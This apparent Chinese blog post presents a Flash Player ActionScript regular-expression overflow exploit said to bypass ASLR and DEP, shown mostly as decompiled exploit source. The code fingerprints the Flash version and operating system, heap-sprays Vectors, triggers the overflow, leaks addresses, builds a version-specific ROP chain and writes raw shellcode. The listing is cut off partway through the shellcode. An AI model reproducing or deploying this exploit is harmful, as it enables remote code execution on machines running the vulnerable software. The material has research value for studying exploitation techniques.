新年再不用微博就彻底落伍啦,欢迎互粉
http://weibo.com/u/2853226971
1. 漏洞描述
Adobe Flash Player ActionScript 3.0处理正则表达式存在溢出导致任意代码执行
且EXP技巧非常之高可绕过ASLR+DEP
2. 测试环境
Adobe Flash Player 11.5.502.146
Office 2010
Windows XP SP3
3. 漏洞分析
LadyBoyle ActionScript:
package
{
import __AS3__.vec.*;
import flash.display.*;
import flash.media.*;
import flash.net.*;
import flash.system.*;
import flash.text.*;
import flash.utils.*;
public class LadyBoyle extends Sprite
{
private var the_x32_Class:Class;
private var the_x64_Class:Class;
public var version:Object;
public function LadyBoyle()
{
var _loc_2:* = null;
var _loc_23:* = NaN;
var _loc_24:* = null;
var _loc_25:* = 0;
var _loc_26:* = 0;
var _loc_27:* = null;
var _loc_28:* = null;
var _loc_29:* = null;
var _loc_30:* = null;
var _loc_31:* = 0;
var _loc_32:* = 0;
var _loc_33:* = 0;
var _loc_34:* = undefined;
var _loc_35:* = null;
var _loc_36:* = 0;
var _loc_37:* = 0;
var _loc_38:* = 0;
var _loc_39:* = 0;
var _loc_40:* = 0;
this.the_x32_Class = LadyBoyle_the_x32_Class;
this.the_x64_Class = LadyBoyle_the_x64_Class;
this.version = Capabilities.version.toLowerCase().toString();
var _loc_1:* = 0;
var _loc_3:* = 0;
var _loc_4:* = new ByteArray();
var _loc_5:* = new Vector.<Object>(0);
var _loc_6:* = new Sound();
var _loc_7:* = 0;
var _loc_8:* = 0;
var _loc_9:* = 0;
var _loc_10:* = 0;
var _loc_11:* = 0;
var _loc_12:* = 0;
var _loc_13:* = 0;
var _loc_14:* = 0;
var _loc_15:* = 0;
var _loc_16:* = 0;
var _loc_17:* = _loc_4;
switch(this.version)
{
case "win 11,5,502,146":
{
break;
}
case "win 11,5,502,135":
{
break;
}
case "win 11,5,502,110":
{
break;
}
case "win 11,4,402,287":
{
break;
}
case "win 11,4,402,278":
{
break;
}
case "win 11,4,402,265":
{
break;
}
default:
{
return this.empty();
break;
}
}
var _loc_18:* = SharedObject.getLocal("ImplentenstWell");
if (SharedObject.getLocal("ImplentenstWell").size != 0)
{
_loc_23 = new Date().time - _loc_18.data.now;
if (_loc_23 > 7 * 24 * 60 * 60 * 1000)
{
_loc_18.close();
}
else
{
return this.empty();
}
}
var _loc_19:* = Capabilities.os.toLowerCase().toString();
switch(_loc_19)
{
case "windows 7":
{
break;
}
case "windows server 2008 r2":
{
break;
}
case "windows server 2008":
{
break;
}
case "windows server 2003 r2":
{
break;
}
case "windows server 2003":
{
break;
}
case "windows xp":
{
break;
}
case "windows vista":
{
break;
}
default:
{
return this.empty();
break;
}
}
_loc_1 = 0;
while (_loc_1 < 0x4000)
{
_loc_24 = "";
_loc_3 = 0;
while (_loc_3 < 42)
{
_loc_24 = _loc_24 + String.fromCharCode(this.randRange(97, 122));
_loc_3 = _loc_3 + 1;
}
new Vector.<Object>(16)[0] = new RegExp(_loc_24, "");
new Vector.<Number>(16)[0] = 0;
new Vector.<Number>(16)[1] = 0;
new Vector.<Number>(16)[2] = 0;
new Vector.<Number>(16)[3] = 0;
new Vector.<Number>(16)[4] = 0;
new Vector.<Number>(16)[5] = 0;
new Vector.<Number>(16)[6] = 0;
new Vector.<Number>(16)[7] = 0;
new Vector.<Number>(16)[8] = 0;
new Vector.<Number>(16)[9] = 0;
new Vector.<Number>(16)[10] = 0;
new Vector.<Number>(16)[11] = 0;
new Vector.<Number>(16)[12] = 0;
new Vector.<Number>(16)[13] = 0;
new Vector.<Number>(16)[14] = 0;
new Vector.<Number>(16)[15] = 1;
new Vector.<Object>(16)[1] = new Vector.<Number>(16);
new Vector.<Number>(16)[0] = 0;
new Vector.<Number>(16)[1] = 0;
new Vector.<Number>(16)[2] = 0;
new Vector.<Number>(16)[3] = 0;
new Vector.<Number>(16)[4] = 0;
new Vector.<Number>(16)[5] = 0;
new Vector.<Number>(16)[6] = 0;
new Vector.<Number>(16)[7] = 0;
new Vector.<Number>(16)[8] = 0;
new Vector.<Number>(16)[9] = 0;
new Vector.<Number>(16)[10] = 0;
new Vector.<Number>(16)[11] = 0;
new Vector.<Number>(16)[12] = 0;
new Vector.<Number>(16)[13] = 0;
new Vector.<Number>(16)[14] = 0;
new Vector.<Number>(16)[15] = 1;
new Vector.<Object>(16)[2] = new Vector.<Number>(16);
new Vector.<Number>(16)[0] = 0;
new Vector.<Number>(16)[1] = 0;
new Vector.<Number>(16)[2] = 0;
new Vector.<Number>(16)[3] = 0;
new Vector.<Number>(16)[4] = 0;
new Vector.<Number>(16)[5] = 0;
new Vector.<Number>(16)[6] = 0;
new Vector.<Number>(16)[7] = 0;
new Vector.<Number>(16)[8] = 0;
new Vector.<Number>(16)[9] = 0;
new Vector.<Number>(16)[10] = 0;
new Vector.<Number>(16)[11] = 0;
new Vector.<Number>(16)[12] = 0;
new Vector.<Number>(16)[13] = 0;
new Vector.<Number>(16)[14] = 0;
new Vector.<Number>(16)[15] = 1;
new Vector.<Object>(16)[3] = new Vector.<Number>(16);
new Vector.<Number>(16)[0] = 0;
new Vector.<Number>(16)[1] = 0;
new Vector.<Number>(16)[2] = 0;
new Vector.<Number>(16)[3] = 0;
new Vector.<Number>(16)[4] = 0;
new Vector.<Number>(16)[5] = 0;
new Vector.<Number>(16)[6] = 0;
new Vector.<Number>(16)[7] = 0;
new Vector.<Number>(16)[8] = 0;
new Vector.<Number>(16)[9] = 0;
new Vector.<Number>(16)[10] = 0;
new Vector.<Number>(16)[11] = 0;
new Vector.<Number>(16)[12] = 0;
new Vector.<Number>(16)[13] = 0;
new Vector.<Number>(16)[14] = 0;
new Vector.<Number>(16)[15] = 1;
new Vector.<Object>(16)[4] = new Vector.<Number>(16);
new Vector.<Number>(16)[0] = 0;
new Vector.<Number>(16)[1] = 0;
new Vector.<Number>(16)[2] = 0;
new Vector.<Number>(16)[3] = 0;
new Vector.<Number>(16)[4] = 0;
new Vector.<Number>(16)[5] = 0;
new Vector.<Number>(16)[6] = 0;
new Vector.<Number>(16)[7] = 0;
new Vector.<Number>(16)[8] = 0;
new Vector.<Number>(16)[9] = 0;
new Vector.<Number>(16)[10] = 0;
new Vector.<Number>(16)[11] = 0;
new Vector.<Number>(16)[12] = 0;
new Vector.<Number>(16)[13] = 0;
new Vector.<Number>(16)[14] = 0;
new Vector.<Number>(16)[15] = 1;
new Vector.<Object>(16)[5] = new Vector.<Number>(16);
new Vector.<Number>(16)[0] = 0;
new Vector.<Number>(16)[1] = 0;
new Vector.<Number>(16)[2] = 0;
new Vector.<Number>(16)[3] = 0;
new Vector.<Number>(16)[4] = 0;
new Vector.<Number>(16)[5] = 0;
new Vector.<Number>(16)[6] = 0;
new Vector.<Number>(16)[7] = 0;
new Vector.<Number>(16)[8] = 0;
new Vector.<Number>(16)[9] = 0;
new Vector.<Number>(16)[10] = 0;
new Vector.<Number>(16)[11] = 0;
new Vector.<Number>(16)[12] = 0;
new Vector.<Number>(16)[13] = 0;
new Vector.<Number>(16)[14] = 0;
new Vector.<Number>(16)[15] = 1;
new Vector.<Object>(16)[6] = new Vector.<Number>(16);
new Vector.<Number>(16)[0] = 0;
new Vector.<Number>(16)[1] = 0;
new Vector.<Number>(16)[2] = 0;
new Vector.<Number>(16)[3] = 0;
new Vector.<Number>(16)[4] = 0;
new Vector.<Number>(16)[5] = 0;
new Vector.<Number>(16)[6] = 0;
new Vector.<Number>(16)[7] = 0;
new Vector.<Number>(16)[8] = 0;
new Vector.<Number>(16)[9] = 0;
new Vector.<Number>(16)[10] = 0;
new Vector.<Number>(16)[11] = 0;
new Vector.<Number>(16)[12] = 0;
new Vector.<Number>(16)[13] = 0;
new Vector.<Number>(16)[14] = 0;
new Vector.<Number>(16)[15] = 1;
new Vector.<Object>(16)[7] = new Vector.<Number>(16);
new Vector.<Number>(16)[0] = 0;
new Vector.<Number>(16)[1] = 0;
new Vector.<Number>(16)[2] = 0;
new Vector.<Number>(16)[3] = 0;
new Vector.<Number>(16)[4] = 0;
new Vector.<Number>(16)[5] = 0;
new Vector.<Number>(16)[6] = 0;
new Vector.<Number>(16)[7] = 0;
new Vector.<Number>(16)[8] = 0;
new Vector.<Number>(16)[9] = 0;
new Vector.<Number>(16)[10] = 0;
new Vector.<Number>(16)[11] = 0;
new Vector.<Number>(16)[12] = 0;
new Vector.<Number>(16)[13] = 0;
new Vector.<Number>(16)[14] = 0;
new Vector.<Number>(16)[15] = 1;
new Vector.<Object>(16)[8] = new Vector.<Number>(16);
new Vector.<Object>(32)[0] = null;
new Vector.<Object>(32)[1] = _loc_6;
new Vector.<Object>(32)[2] = _loc_4;
new Vector.<Object>(32)[3] = _loc_4;
new Vector.<Object>(32)[4] = _loc_4;
new Vector.<Object>(32)[5] = _loc_4;
new Vector.<Object>(32)[6] = _loc_4;
new Vector.<Object>(32)[7] = _loc_4;
new Vector.<Object>(32)[8] = _loc_4;
new Vector.<Object>(32)[9] = _loc_4;
new Vector.<Object>(32)[10] = _loc_4;
new Vector.<Object>(32)[11] = _loc_4;
new Vector.<Object>(32)[12] = _loc_4;
new Vector.<Object>(32)[13] = _loc_4;
new Vector.<Object>(32)[14] = _loc_4;
new Vector.<Object>(32)[15] = _loc_4;
new Vector.<Object>(32)[16] = _loc_4;
new Vector.<Object>(32)[17] = _loc_4;
new Vector.<Object>(32)[18] = _loc_4;
new Vector.<Object>(32)[19] = _loc_4;
new Vector.<Object>(32)[20] = _loc_4;
new Vector.<Object>(32)[21] = _loc_4;
new Vector.<Object>(32)[22] = _loc_4;
new Vector.<Object>(32)[23] = _loc_4;
new Vector.<Object>(32)[24] = _loc_4;
new Vector.<Object>(32)[25] = _loc_4;
new Vector.<Object>(32)[26] = _loc_4;
new Vector.<Object>(32)[27] = _loc_4;
new Vector.<Object>(32)[28] = _loc_4;
new Vector.<Object>(32)[29] = _loc_4;
new Vector.<Object>(32)[30] = _loc_4;
new Vector.<Object>(32)[31] = _loc_4;
new Vector.<Object>(16)[9] = new Vector.<Object>(32);
new Vector.<Object>(32)[0] = null;
new Vector.<Object>(32)[1] = _loc_6;
new Vector.<Object>(32)[2] = _loc_4;
new Vector.<Object>(32)[3] = _loc_4;
new Vector.<Object>(32)[4] = _loc_4;
new Vector.<Object>(32)[5] = _loc_4;
new Vector.<Object>(32)[6] = _loc_4;
new Vector.<Object>(32)[7] = _loc_4;
new Vector.<Object>(32)[8] = _loc_4;
new Vector.<Object>(32)[9] = _loc_4;
new Vector.<Object>(32)[10] = _loc_4;
new Vector.<Object>(32)[11] = _loc_4;
new Vector.<Object>(32)[12] = _loc_4;
new Vector.<Object>(32)[13] = _loc_4;
new Vector.<Object>(32)[14] = _loc_4;
new Vector.<Object>(32)[15] = _loc_4;
new Vector.<Object>(32)[16] = _loc_4;
new Vector.<Object>(32)[17] = _loc_4;
new Vector.<Object>(32)[18] = _loc_4;
new Vector.<Object>(32)[19] = _loc_4;
new Vector.<Object>(32)[20] = _loc_4;
new Vector.<Object>(32)[21] = _loc_4;
new Vector.<Object>(32)[22] = _loc_4;
new Vector.<Object>(32)[23] = _loc_4;
new Vector.<Object>(32)[24] = _loc_4;
new Vector.<Object>(32)[25] = _loc_4;
new Vector.<Object>(32)[26] = _loc_4;
new Vector.<Object>(32)[27] = _loc_4;
new Vector.<Object>(32)[28] = _loc_4;
new Vector.<Object>(32)[29] = _loc_4;
new Vector.<Object>(32)[30] = _loc_4;
new Vector.<Object>(32)[31] = _loc_4;
new Vector.<Object>(16)[10] = new Vector.<Object>(32);
new Vector.<Object>(32)[0] = null;
new Vector.<Object>(32)[1] = _loc_6;
new Vector.<Object>(32)[2] = _loc_4;
new Vector.<Object>(32)[3] = _loc_4;
new Vector.<Object>(32)[4] = _loc_4;
new Vector.<Object>(32)[5] = _loc_4;
new Vector.<Object>(32)[6] = _loc_4;
new Vector.<Object>(32)[7] = _loc_4;
new Vector.<Object>(32)[8] = _loc_4;
new Vector.<Object>(32)[9] = _loc_4;
new Vector.<Object>(32)[10] = _loc_4;
new Vector.<Object>(32)[11] = _loc_4;
new Vector.<Object>(32)[12] = _loc_4;
new Vector.<Object>(32)[13] = _loc_4;
new Vector.<Object>(32)[14] = _loc_4;
new Vector.<Object>(32)[15] = _loc_4;
new Vector.<Object>(32)[16] = _loc_4;
new Vector.<Object>(32)[17] = _loc_4;
new Vector.<Object>(32)[18] = _loc_4;
new Vector.<Object>(32)[19] = _loc_4;
new Vector.<Object>(32)[20] = _loc_4;
new Vector.<Object>(32)[21] = _loc_4;
new Vector.<Object>(32)[22] = _loc_4;
new Vector.<Object>(32)[23] = _loc_4;
new Vector.<Object>(32)[24] = _loc_4;
new Vector.<Object>(32)[25] = _loc_4;
new Vector.<Object>(32)[26] = _loc_4;
new Vector.<Object>(32)[27] = _loc_4;
new Vector.<Object>(32)[28] = _loc_4;
new Vector.<Object>(32)[29] = _loc_4;
new Vector.<Object>(32)[30] = _loc_4;
new Vector.<Object>(32)[31] = _loc_4;
new Vector.<Object>(16)[11] = new Vector.<Object>(32);
new Vector.<Object>(32)[0] = null;
new Vector.<Object>(32)[1] = _loc_6;
new Vector.<Object>(32)[2] = _loc_4;
new Vector.<Object>(32)[3] = _loc_4;
new Vector.<Object>(32)[4] = _loc_4;
new Vector.<Object>(32)[5] = _loc_4;
new Vector.<Object>(32)[6] = _loc_4;
new Vector.<Object>(32)[7] = _loc_4;
new Vector.<Object>(32)[8] = _loc_4;
new Vector.<Object>(32)[9] = _loc_4;
new Vector.<Object>(32)[10] = _loc_4;
new Vector.<Object>(32)[11] = _loc_4;
new Vector.<Object>(32)[12] = _loc_4;
new Vector.<Object>(32)[13] = _loc_4;
new Vector.<Object>(32)[14] = _loc_4;
new Vector.<Object>(32)[15] = _loc_4;
new Vector.<Object>(32)[16] = _loc_4;
new Vector.<Object>(32)[17] = _loc_4;
new Vector.<Object>(32)[18] = _loc_4;
new Vector.<Object>(32)[19] = _loc_4;
new Vector.<Object>(32)[20] = _loc_4;
new Vector.<Object>(32)[21] = _loc_4;
new Vector.<Object>(32)[22] = _loc_4;
new Vector.<Object>(32)[23] = _loc_4;
new Vector.<Object>(32)[24] = _loc_4;
new Vector.<Object>(32)[25] = _loc_4;
new Vector.<Object>(32)[26] = _loc_4;
new Vector.<Object>(32)[27] = _loc_4;
new Vector.<Object>(32)[28] = _loc_4;
new Vector.<Object>(32)[29] = _loc_4;
new Vector.<Object>(32)[30] = _loc_4;
new Vector.<Object>(32)[31] = _loc_4;
new Vector.<Object>(16)[12] = new Vector.<Object>(32);
new Vector.<Object>(32)[0] = null;
new Vector.<Object>(32)[1] = _loc_6;
new Vector.<Object>(32)[2] = _loc_4;
new Vector.<Object>(32)[3] = _loc_4;
new Vector.<Object>(32)[4] = _loc_4;
new Vector.<Object>(32)[5] = _loc_4;
new Vector.<Object>(32)[6] = _loc_4;
new Vector.<Object>(32)[7] = _loc_4;
new Vector.<Object>(32)[8] = _loc_4;
new Vector.<Object>(32)[9] = _loc_4;
new Vector.<Object>(32)[10] = _loc_4;
new Vector.<Object>(32)[11] = _loc_4;
new Vector.<Object>(32)[12] = _loc_4;
new Vector.<Object>(32)[13] = _loc_4;
new Vector.<Object>(32)[14] = _loc_4;
new Vector.<Object>(32)[15] = _loc_4;
new Vector.<Object>(32)[16] = _loc_4;
new Vector.<Object>(32)[17] = _loc_4;
new Vector.<Object>(32)[18] = _loc_4;
new Vector.<Object>(32)[19] = _loc_4;
new Vector.<Object>(32)[20] = _loc_4;
new Vector.<Object>(32)[21] = _loc_4;
new Vector.<Object>(32)[22] = _loc_4;
new Vector.<Object>(32)[23] = _loc_4;
new Vector.<Object>(32)[24] = _loc_4;
new Vector.<Object>(32)[25] = _loc_4;
new Vector.<Object>(32)[26] = _loc_4;
new Vector.<Object>(32)[27] = _loc_4;
new Vector.<Object>(32)[28] = _loc_4;
new Vector.<Object>(32)[29] = _loc_4;
new Vector.<Object>(32)[30] = _loc_4;
new Vector.<Object>(32)[31] = _loc_4;
new Vector.<Object>(16)[13] = new Vector.<Object>(32);
new Vector.<Object>(32)[0] = null;
new Vector.<Object>(32)[1] = _loc_6;
new Vector.<Object>(32)[2] = _loc_4;
new Vector.<Object>(32)[3] = _loc_4;
new Vector.<Object>(32)[4] = _loc_4;
new Vector.<Object>(32)[5] = _loc_4;
new Vector.<Object>(32)[6] = _loc_4;
new Vector.<Object>(32)[7] = _loc_4;
new Vector.<Object>(32)[8] = _loc_4;
new Vector.<Object>(32)[9] = _loc_4;
new Vector.<Object>(32)[10] = _loc_4;
new Vector.<Object>(32)[11] = _loc_4;
new Vector.<Object>(32)[12] = _loc_4;
new Vector.<Object>(32)[13] = _loc_4;
new Vector.<Object>(32)[14] = _loc_4;
new Vector.<Object>(32)[15] = _loc_4;
new Vector.<Object>(32)[16] = _loc_4;
new Vector.<Object>(32)[17] = _loc_4;
new Vector.<Object>(32)[18] = _loc_4;
new Vector.<Object>(32)[19] = _loc_4;
new Vector.<Object>(32)[20] = _loc_4;
new Vector.<Object>(32)[21] = _loc_4;
new Vector.<Object>(32)[22] = _loc_4;
new Vector.<Object>(32)[23] = _loc_4;
new Vector.<Object>(32)[24] = _loc_4;
new Vector.<Object>(32)[25] = _loc_4;
new Vector.<Object>(32)[26] = _loc_4;
new Vector.<Object>(32)[27] = _loc_4;
new Vector.<Object>(32)[28] = _loc_4;
new Vector.<Object>(32)[29] = _loc_4;
new Vector.<Object>(32)[30] = _loc_4;
new Vector.<Object>(32)[31] = _loc_4;
new Vector.<Object>(16)[14] = new Vector.<Object>(32);
new Vector.<Object>(32)[0] = null;
new Vector.<Object>(32)[1] = _loc_6;
new Vector.<Object>(32)[2] = _loc_4;
new Vector.<Object>(32)[3] = _loc_4;
new Vector.<Object>(32)[4] = _loc_4;
new Vector.<Object>(32)[5] = _loc_4;
new Vector.<Object>(32)[6] = _loc_4;
new Vector.<Object>(32)[7] = _loc_4;
new Vector.<Object>(32)[8] = _loc_4;
new Vector.<Object>(32)[9] = _loc_4;
new Vector.<Object>(32)[10] = _loc_4;
new Vector.<Object>(32)[11] = _loc_4;
new Vector.<Object>(32)[12] = _loc_4;
new Vector.<Object>(32)[13] = _loc_4;
new Vector.<Object>(32)[14] = _loc_4;
new Vector.<Object>(32)[15] = _loc_4;
new Vector.<Object>(32)[16] = _loc_4;
new Vector.<Object>(32)[17] = _loc_4;
new Vector.<Object>(32)[18] = _loc_4;
new Vector.<Object>(32)[19] = _loc_4;
new Vector.<Object>(32)[20] = _loc_4;
new Vector.<Object>(32)[21] = _loc_4;
new Vector.<Object>(32)[22] = _loc_4;
new Vector.<Object>(32)[23] = _loc_4;
new Vector.<Object>(32)[24] = _loc_4;
new Vector.<Object>(32)[25] = _loc_4;
new Vector.<Object>(32)[26] = _loc_4;
new Vector.<Object>(32)[27] = _loc_4;
new Vector.<Object>(32)[28] = _loc_4;
new Vector.<Object>(32)[29] = _loc_4;
new Vector.<Object>(32)[30] = _loc_4;
new Vector.<Object>(32)[31] = _loc_4;
new Vector.<Object>(16)[15] = new Vector.<Object>(32);
_loc_5[_loc_1] = new Vector.<Object>(16);
_loc_1 = _loc_1 + 1;
}
_loc_1 = 0x2012;
while (_loc_1 < (0x4000 - 1))
{
if (_loc_1 % 2 != 0)
{
_loc_5[_loc_1][2] = null;
}
_loc_1 = _loc_1 + 1;
}
_loc_2 = "(?i)()()(?-i)||||||||||||||||||||||";
var _loc_20:* = new RegExp(_loc_2, "");
var _loc_21:* = false;
var _loc_22:* = 0;
_loc_1 = 0;
while (_loc_1 < 0x4000)
{
if (_loc_21)
{
break;
}
_loc_8 = 1;
while (_loc_8 <= 8)
{
try
{
if ((_loc_5[_loc_1][_loc_8] as Vector.<Number>).length > 17)
{
_loc_7 = _loc_1;
_loc_22 = _loc_8;
_loc_21 = true;
break;
}
}
catch (e:Error)
{
}
_loc_8 = _loc_8 + 1;
}
_loc_1 = _loc_1 + 1;
}
if (!_loc_21)
{
while (1)
{
}
}
if (this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, 17)[0] == 16)
{
_loc_9 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, 17)[1];
(_loc_5[_loc_7][_loc_22] as Vector.<Number>)[17] = this.UintToDouble(0xffffffff, _loc_9);
(_loc_5[_loc_7][_loc_22] as Vector.<Number>)[18] = this.UintToDouble(0x41414141, 0);
_loc_21 = false;
_loc_1 = 0;
while (_loc_1 < 0x4000)
{
if (_loc_21)
{
break;
}
_loc_8 = 1;
while (_loc_8 <= 8)
{
try
{
if (this.ReadDouble(_loc_5[_loc_1][_loc_8] as Vector.<Number>, 0)[0] == 0x41414141)
{
_loc_7 = _loc_1;
_loc_22 = _loc_8;
_loc_21 = true;
break;
}
}
catch (e:Error)
{
}
_loc_8 = _loc_8 + 1;
}
_loc_1 = _loc_1 + 1;
}
if (!_loc_21)
{
while (1)
{
}
}
(_loc_5[_loc_7][_loc_22] as Vector.<Number>)[0x1fffffed] = this.UintToDouble(16, _loc_9);
_loc_1 = 0;
while (_loc_1 < 0x1000)
{
if (this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_1)[1] == 32 && this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, (_loc_1 + 1))[0] == 1)
{
_loc_11 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, (_loc_1 + 1))[1] & 0xfffffff8;
_loc_12 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_1 + 2)[0] & 0xfffffff8;
_loc_13 = _loc_12;
break;
}
_loc_1 = _loc_1 + 1;
}
if (_loc_1 == 0x1000)
{
(_loc_5[_loc_7][_loc_22] as Vector.<Number>)[0x1fffffff] = this.UintToDouble(16, _loc_9);
return;
}
_loc_1 = 0;
while (_loc_1 < 0x4000)
{
_loc_8 = 1;
while (_loc_8 <= 8)
{
if (!(_loc_1 == _loc_7 && _loc_8 == _loc_22))
{
_loc_5[_loc_1][_loc_8] = null;
}
_loc_8 = _loc_8 + 1;
}
_loc_1 = _loc_1 + 1;
}
_loc_1 = 1;
while (_loc_1 < 4)
{
_loc_29 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, 17 * _loc_1 + (_loc_1 - 1));
_loc_30 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, 17 * (_loc_1 + 1) + _loc_1);
if (_loc_29[1] == _loc_9 && _loc_30[1] == _loc_9 && _loc_29[1] < _loc_29[0] && _loc_30[1] < _loc_30[0] && _loc_30[0] - _loc_29[0] == 144)
{
_loc_10 = _loc_29[0] - 144 * (_loc_1 + 1);
break;
}
_loc_1 = _loc_1 + 1;
}
if (_loc_10 == 0)
{
(_loc_5[_loc_7][_loc_22] as Vector.<Number>)[0x1fffffff] = this.UintToDouble(16, _loc_9);
return;
}
_loc_1 = 0;
while (_loc_1 < 1024 * 100)
{
_loc_17.writeUnsignedInt(0x41414141);
_loc_1 = _loc_1 + 1;
}
_loc_15 = (_loc_12 + 64 - _loc_10 - 8) / 8;
_loc_12 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_15)[0];
_loc_15 = (_loc_12 + 8 - _loc_10 - 8) / 8;
_loc_12 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_15)[0];
_loc_12 = _loc_12 + _loc_17.position;
_loc_14 = _loc_17.position;
_loc_15 = (_loc_11 - _loc_10 - 8) / 8;
_loc_16 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_15)[0];
_loc_25 = 0;
_loc_26 = 0;
_loc_27 = Capabilities.version.toLowerCase();
switch(_loc_27)
{
case "win 11,5,502,146":
{
if (Capabilities.playerType.toLowerCase() == "activex")
{
_loc_25 = _loc_16 - 0x1c0dc8;
_loc_26 = _loc_16 - 0x8c500;
}
break;
}
case "win 11,5,502,135":
{
if (Capabilities.playerType.toLowerCase() == "activex")
{
_loc_25 = _loc_16 - 0x2293ab;
_loc_26 = _loc_16 - 0x8c590;
}
break;
}
case "win 11,5,502,110":
{
if (Capabilities.playerType.toLowerCase() == "activex")
{
_loc_25 = _loc_16 - 0x186a6e;
_loc_26 = _loc_16 - 0x8c3d8;
}
break;
}
case "win 11,4,402,287":
{
if (Capabilities.playerType.toLowerCase() == "activex")
{
_loc_25 = _loc_16 - 0x469196;
_loc_26 = _loc_16 - 0x8c2f4;
}
break;
}
case "win 11,4,402,278":
{
if (Capabilities.playerType.toLowerCase() == "activex")
{
_loc_25 = _loc_16 - 0x12bca1;
_loc_26 = _loc_16 - 0x8c1b4;
}
break;
}
case "win 11,4,402,265":
{
if (Capabilities.playerType.toLowerCase() == "activex")
{
_loc_25 = _loc_16 - 0x78f07b;
_loc_26 = _loc_16 - 0x8c1b4;
}
break;
}
default:
{
(_loc_5[_loc_7][_loc_22] as Vector.<Number>)[0x1fffffff] = this.UintToDouble(16, _loc_9);
return;
break;
}
}
if (_loc_27 == "win 11,5,502,110" || _loc_27 == "win 11,5,502,135" || _loc_27 == "win 11,5,502,146")
{
_loc_15 = (_loc_26 - _loc_10 - 8) / 8;
_loc_26 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_15)[0];
}
else
{
_loc_15 = (_loc_26 - 4 - _loc_10 - 8) / 8;
_loc_26 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_15)[1];
}
_loc_17.endian = Endian.LITTLE_ENDIAN;
_loc_17.position = _loc_17.position + 112;
_loc_17.writeUnsignedInt(_loc_25);
_loc_17.position = _loc_17.position - 112 - 4;
_loc_17.writeUnsignedInt(_loc_26); // ROP Chain
_loc_17.writeUnsignedInt(_loc_12 + 136);
_loc_17.writeUnsignedInt(_loc_12);
_loc_17.writeUnsignedInt(0x2000);
_loc_17.writeUnsignedInt(0x1000);
_loc_17.writeUnsignedInt(64);
_loc_17.position = _loc_17.position + 112;
_loc_17.writeUnsignedInt(0xec8390cc);
_loc_17.writeUnsignedInt(0x64db3370);
_loc_17.writeUnsignedInt(0x8b185b8b);
_loc_17.writeUnsignedInt(0x5b8b305b);
_loc_17.writeUnsignedInt(0x1c5b8b0c);
_loc_17.writeUnsignedInt(0x8b08538b);
_loc_17.writeUnsignedInt(0x7c8b3c7a);
_loc_17.writeUnsignedInt(0xbc8d2c3a);
_loc_17.writeUnsignedInt(0xe0003a);
_loc_17.writeUnsignedInt(0x408bb800);
_loc_17.writeUnsignedInt(0x739c330);
_loc_17.writeUnsignedInt(0xeb470374);
_loc_17.writeUnsignedInt(0x68ef8bf9);
_loc_17.writeUnsignedInt(0x6c0065);
_loc_17.writeUnsignedInt(0x6e007268);
_loc_17.writeUnsignedInt(0x6b6800);
_loc_17.writeUnsignedInt(0x33fc0065);
_loc_17.writeUnsignedInt(0x8b1b8bc9);
_loc_17.writeUnsignedInt(0x207b8bf4);
_loc_17.writeUnsignedInt(0xa7f303b1);
_loc_17.writeUnsignedInt(0x5b8bf375);
_loc_17.writeUnsignedInt(0x3c538b08);
_loc_17.writeUnsignedInt(0x781a548b);
_loc_17.writeUnsignedInt(0xec1a448d);
_loc_17.writeUnsignedInt(0x548bd5ff);
_loc_17.writeUnsignedInt(0xd303201a);
_loc_17.writeUnsignedInt(0xc933c303);
_loc_17.writeUnsignedInt(0x10e8);
_loc_17.writeUnsignedInt(0x74655300);
_loc_17.writeUnsignedInt(0x65726854);
_loc_17.writeUnsignedInt(0x6f436461);
_loc_17.writeUnsignedInt(0x7865746e);
_loc_17.writeUnsignedInt(0x24348b74);
_loc_17.writeUnsignedInt(0xfb033a8b);
_loc_17.writeUnsignedInt(0xa7f304b1);
_loc_17.writeUnsignedInt(0xc2830874);
_loc_17.writeUnsignedInt(0x4c08304);
_loc_17.writeUnsignedInt(0x108bebeb);
_loc_17.writeUnsignedInt(0xc033d303);
_loc_17.writeUnsignedInt(0x20b1c88b);
_loc_17.writeUnsignedInt(0xabf3fc8b);
_loc_17.writeUnsignedInt(0x102404c7);
_loc_17.writeUnsignedInt(0x54000100);
_loc_17.writeUnsignedInt(0xd2fffe6a);
_loc_17.writeUnsignedInt(0x90909090);
_loc_17.writeUnsignedInt(0x90909090);
_loc_17.writeUnsignedInt(0x90909090);
_loc_17.writeUnsignedInt(0x90909090);
_loc_17.writeUnsignedInt(0xec8160);
_loc_17.writeUnsignedInt(0x8b000004);
_loc_17.writeUnsignedInt(0x5c47c7fc);
_loc_17.writeUnsignedInt(0x41414141);
_loc_17.writeUnsignedInt(0x5847c790);
_loc_17.writeUnsignedInt(0x42424242);
_loc_17.writeUnsignedInt(0x743207c7);
_loc_17.writeUnsignedInt(0x47c70c91);
_loc_17.writeUnsignedInt(0xa138e04);
_loc_17.writeUnsignedInt(0x847c7ac);
_loc_17.writeUnsignedInt(0x837de239);
_loc_17.writeUnsignedInt(0x8f0c47c7);
_loc_17.writeUnsignedInt(0xc76118f2);
_loc_17.writeUnsignedInt(0x32931047);
_loc_17.writeUnsignedInt(0x47c794e4);
_loc_17.writeUnsignedInt(0x9bd55014);
_loc_17.writeUnsignedInt(0x1847c7cb);
_loc_17.writeUnsignedInt(0xdbacbe43);
_loc_17.writeUnsignedInt(0xb21c47c7);
_loc_17.writeUnsignedInt(0xc7130f36);
_loc_17.writeUnsignedInt(0x8dc42047);
_loc_17.writeUnsignedInt(0x47c7741f);
_loc_17.writeUnsignedInt(0xa22f5124);
_loc_17.writeUnsignedInt(0x2847c701);
_loc_17.writeUnsignedInt(0xff0d6657);
_loc_17.writeUnsignedInt(0x9b2c47c7);
_loc_17.writeUnsignedInt(0xc7e58b87);
_loc_17.writeUnsignedInt(0xafed3047);
